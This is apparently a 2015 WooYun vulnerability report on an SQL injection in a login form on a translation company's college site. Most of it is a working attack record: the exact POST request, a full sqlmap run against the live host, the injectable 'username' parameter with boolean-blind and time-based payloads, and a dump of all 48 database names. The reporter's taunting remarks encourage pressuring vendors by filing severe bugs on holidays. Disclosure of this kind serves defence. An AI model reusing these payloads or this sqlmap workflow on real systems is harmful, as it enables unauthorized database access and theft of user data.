当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111011

漏洞标题:transn传神某处sql注入漏洞导致全网数据泄漏48个数据库

相关厂商:transn.com

漏洞作者: 路人甲

提交时间:2015-04-29 10:42

修复时间:2015-05-04 10:44

公开时间:2015-05-04 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

最不喜欢动不动就问厂商要礼物的~ 靠! 他实在不给你就使劲提交漏洞!!最好在节假日提交很高危的漏洞!!!~裤子也挺重要的!

详细说明:

POST /tools/fanyidasai/fanyidasai.php HTTP/1.1
Host: college.transn.com
Proxy-Connection: keep-alive
Content-Length: 116
Accept: text/plain, */*; q=0.01
Origin: http://college.transn.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://college.transn.com/tools/fanyidasai/regist.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
username=123&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class=&number=&cardid=&tel=&email=


QQ截图20150429102332.png


QQ截图20150429102341.png


漏洞证明:

QQ截图20150429102355.png


[root@Hacker~]# Sqlmap Sqlmap -r E:\1.txt --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey al
[*] starting at 10:11:18
[10:11:18] [INFO] parsing HTTP request from 'E:\1.txt'
[10:11:18] [INFO] testing connection to the target URL
[10:11:18] [INFO] testing if the target URL is stable. This can take a couple of seconds
[10:11:20] [INFO] target URL is stable
[10:11:20] [INFO] testing if POST parameter 'username' is dynamic
[10:11:20] [WARNING] POST parameter 'username' does not appear dynamic
[10:11:20] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
[10:11:20] [INFO] testing for SQL injection on POST parameter 'username'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[10:11:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:11:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:11:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:11:28] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[10:11:29] [INFO] POST parameter 'username' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[10:11:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[10:11:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[10:11:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[10:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[10:11:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:11:30] [INFO] testing 'MySQL inline queries'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:11:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[10:11:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:11:50] [INFO] POST parameter 'username' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[10:11:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:11:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique fou
[10:11:50] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automaticall
[10:11:51] [INFO] target URL appears to have 37 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[10:12:10] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[10:12:10] [INFO] testing 'MySQL UNION query (14) - 22 to 40 columns'
[10:12:12] [INFO] target URL appears to be UNION injectable with 37 columns
[10:12:18] [INFO] testing 'MySQL UNION query (14) - 42 to 60 columns'
[10:12:20] [INFO] testing 'MySQL UNION query (14) - 62 to 80 columns'
[10:12:21] [INFO] testing 'MySQL UNION query (14) - 82 to 100 columns'
[10:12:23] [INFO] testing 'Generic UNION query (14) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 446 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: username=123' RLIKE IF(9850=9850,123,0x28) AND 'dDUu'='dDUu&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=123' AND 4617=BENCHMARK(5000000,MD5(0x75645772)) AND 'kvZl'='kvZl&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m
---
[10:12:34] [INFO] testing MySQL
[10:12:34] [INFO] confirming MySQL
[10:12:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[10:12:34] [INFO] fetching database names
[10:12:34] [INFO] fetching number of databases
[10:12:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:12:34] [INFO] retrieved: 48
[10:12:35] [INFO] retrieved: information_schema
[10:12:49] [INFO] retrieved: TCATPDB
[10:12:55] [INFO] retrieved: bk_release_wattapi
[10:13:09] [INFO] retrieved: ctat
[10:13:12] [INFO] retrieved: edu_web
[10:13:18] [INFO] retrieved: entwcat
[10:13:24] [INFO] retrieved: icatweb
[10:13:30] [INFO] retrieved: miniwcat
[10:13:36] [INFO] retrieved: miniwtm_miniwcat
[10:13:49] [INFO] retrieved: mysql
[10:13:53] [INFO] retrieved: nankaictat
[10:14:01] [INFO] retrieved: nankaitraining
[10:14:12] [INFO] retrieved: nankaitraining_wtm
[10:14:26] [INFO] retrieved: new_training
[10:14:36] [INFO] retrieved: new_training_wtm
[10:14:49] [INFO] retrieved: release_translib
[10:15:01] [INFO] retrieved: release_wattapi_new
[10:15:19] [INFO] retrieved: school
[10:15:24] [INFO] retrieved: school_bfsu
[10:15:33] [INFO] retrieved: school_bfsu_wtm
[10:15:45] [INFO] retrieved: school_wtm
[10:15:56] [INFO] retrieved: tcat_ent
[10:16:03] [INFO] retrieved: tcat_ent_test
[10:16:13] [INFO] retrieved: tcatwebsite
[10:16:22] [INFO] retrieved: test
[10:16:26] [INFO] retrieved: test0801_wattapi
[10:16:38] [INFO] retrieved: test_entwcat
[10:16:48] [INFO] retrieved: test_translib
[10:16:58] [INFO] retrieved: test_wattapi
[10:17:08] [INFO] retrieved: testctat
[10:17:14] [INFO] retrieved: testedu_web
[10:17:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[10:17:45] [INFO] retrieved: testminiwcat
[10:17:55] [INFO] retrieved: testminiwtm_miniwcat
[10:18:10] [INFO] retrieved: testschool
[10:18:18] [INFO] retrieved: testschool_wtm
[10:18:30] [INFO] retrieved: testtportal
[10:18:39] [INFO] retrieved: testwtm
[10:18:45] [INFO] retrieved: testwtm_miniwcat
[10:18:57] [INFO] retrieved: tportal
[10:19:03] [INFO] retrieved: training
[10:19:10] [INFO] retrieved: training_ctat
[10:19:20] [INFO] retrieved: training_wtm
[10:19:30] [INFO] retrieved: transndict
[10:19:38] [INFO] retrieved: transndict_logs
[10:19:52] [INFO] retrieved: v_translib
[10:20:00] [INFO] retrieved: v_wattapi
[10:20:08] [INFO] retrieved: wtm
[10:20:11] [INFO] retrieved: wtm_miniwcat
available databases [48]:
[*] bk_release_wattapi
[*] ctat
[*] edu_web
[*] entwcat
[*] icatweb
[*] information_schema
[*] miniwcat
[*] miniwtm_miniwcat
[*] mysql
[*] nankaictat
[*] nankaitraining
[*] nankaitraining_wtm
[*] new_training
[*] new_training_wtm
[*] release_translib
[*] release_wattapi_new
[*] school
[*] school_bfsu
[*] school_bfsu_wtm
[*] school_wtm
[*] tcat_ent
[*] tcat_ent_test
[*] TCATPDB
[*] tcatwebsite
[*] test
[*] test0801_wattapi
[*] test_entwcat
[*] test_translib
[*] test_wattapi
[*] testctat
[*] testedu_web
[*] testminiwcat
[*] testminiwtm_miniwcat
[*] testschool
[*] testschool_wtm
[*] testtportal
[*] testwtm
[*] testwtm_miniwcat
[*] tportal
[*] training
[*] training_ctat
[*] training_wtm
[*] transndict
[*] transndict_logs
[*] v_translib
[*] v_wattapi
[*] wtm
[*] wtm_miniwcat
[10:20:24] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled
[10:20:24] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\college.transn.com'

修复方案:

亲,索要联系方式这么久了,我也是醉了!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-04 10:44

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无